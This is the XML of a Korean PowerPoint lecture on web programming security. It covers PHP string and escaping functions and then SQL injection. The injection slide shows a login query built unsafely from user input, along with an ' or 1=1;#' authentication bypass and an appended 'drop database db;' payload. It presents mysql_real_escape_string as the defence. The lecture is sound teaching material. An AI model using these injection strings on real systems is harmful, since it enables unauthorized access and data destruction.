              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>변수 혹은  문자열)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>예) 방명록, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>E-mail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" smtClean="0"/>
              <a:t>strip_tags</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>모든 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>html, php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>태그를 없애주는 함수</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>string strip_tags (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>변수 혹은  문자열)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" smtClean="0"/>
              <a:t>htmlentities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>태그를 그대로 출력하는 함수</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>string htmlentites (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>변수 혹은  문자열)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>&lt;?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>  $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>a="&lt;font size=4 color=red&gt;PHP  lecture&lt;/font&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>  echo("$a&lt;br&gt;");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>  echo(htmlentities($a)."&lt;br&gt;");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>  echo strip_tags($a);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="180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59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228600"/>
            <a:ext cx="7772400" cy="6019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000" smtClean="0"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>특수문자들을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>태그로 변환하는 함수</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>&amp;,&lt;,&gt;등을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>태그로 바꿈</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" smtClean="0"/>
              <a:t>number_format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>number_format(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>숫자, 소숫점자리,소수점 대신 쓸 문자,천단위 대신 쓸 문자)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" smtClean="0"/>
              <a:t>      &lt;?    $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" smtClean="0"/>
              <a:t>a=100000000.9472;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" smtClean="0"/>
              <a:t>             echo("$a&lt;br&gt;");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" smtClean="0"/>
              <a:t>             echo number_format($a)."&lt;br&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" smtClean="0"/>
              <a:t>             echo number_format($a,2)."&lt;br&gt;";        ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" smtClean="0"/>
              <a:t>rand( ), srand( )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" smtClean="0"/>
              <a:t>암호화 함수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" smtClean="0"/>
              <a:t>crypt( ), md5( ), password_hash()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>crypt():</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>역함수가 존재하지 않는 단방향 암호화 함수</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>md5(): hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>값을 알려주는 함수</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" smtClean="0"/>
              <a:t>     &lt;?  $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" smtClean="0"/>
              <a:t>a=crypt("test",20);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" smtClean="0"/>
              <a:t>           $b=md5("test");                    $p_id=password_hash($p_id, PASSWORD_DEFAULT);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" smtClean="0"/>
              <a:t>      // pid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" smtClean="0"/>
              <a:t>필드는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" smtClean="0"/>
              <a:t> 255</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" smtClean="0"/>
              <a:t>문자로 처리 좋음  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" smtClean="0"/>
              <a:t>pid char(255) not null</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" smtClean="0"/>
              <a:t> ?&gt;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68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eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="2000" smtClean="0"/>
              <a:t>urlencode 함수</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>URL을 통해 전달되는 query string을 인코딩하는 함수</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>string urlencode(string str)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>공백문자와 한글을 인코딩함</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>&lt;?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>  $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>search="PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>설치";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>  $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>key=urlencode($search);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>  $url="&lt;a href=\"/cgi-bin/test.php?code=phpqna&amp;page_num=1&amp;key=".$key."&amp;keyword=subject";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>  $url .="\"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" smtClean="0"/>
              <a:t>게시판 검색&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>a&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>  echo($url);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://localhost/cgi-bin/test.php?code=phpqna</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>&amp;page_num=1&amp;key=PHP+%EC%84%A4%EC%B9%98</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
              <a:t>&amp;keyword=subject</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR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32497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6119812"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="365760" indent="-256032" eaLnBrk="1" fontAlgn="auto" hangingPunct="1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 smtClean="0"/>
              <a:t>SQL Injection Attack(SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>삽입 공격</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="16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dirty="0" smtClean="0"/>
              <a:t>Web Application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를 요청할 때 특수문자들을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>filtering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>하지 않아 발생하는 문제점</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="16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dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>‘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Arial" charset="0"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>; , - (space) % </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>와 같은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특수 문자들이 사용자의  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>입력값에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>  포함되어 있을 경우 에러 처리를 하지 않아 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>쿼리문에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>  공격성 내용이 들어가게 되는 것</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1">
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="324"/>
              </a:spcBef>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="◦"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>p_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> from member where id='$id' and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>='$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marL="621792" lvl="1">
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="324"/>
              </a:spcBef>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="◦"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>p_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> from member where id='$id';' and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>='$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marL="621792" lvl="1">
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="324"/>
              </a:spcBef>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="◦"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>p_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> from member where id='$id';#' and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>='$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marL="621792" lvl="1">
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="324"/>
              </a:spcBef>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="◦"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>p_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> from member where id='' or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>1=1;#' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>=‘’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1">
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="324"/>
              </a:spcBef>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="◦"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>p_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> from member where id='$id' and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>='$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>'; drop database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>db; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="621792" lvl="1">
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="324"/>
              </a:spcBef>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="◦"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>()   //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>주의할 점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</TotalTime>
  <Words>1031</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>화면 슬라이드 쇼(4:3)</PresentationFormat>
  <Paragraphs>143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Lucida Sans Unicode</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>광장</vt:lpstr>
      <vt:lpstr>&lt; 웹 프로그램 보안 &gt;</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>&lt; 문자열 다루는 함수 &gt;</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>&lt; 문자열 관련 중요 함수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웹 프로그램 보안 &gt;</dc:title>
  <dc:creator>shim</dc:creator>
  <cp:lastModifiedBy>user</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-09-15T14:52:46Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-05-13T09:44:08Z</dcterms:modified>
</cp:coreProperties>
</file>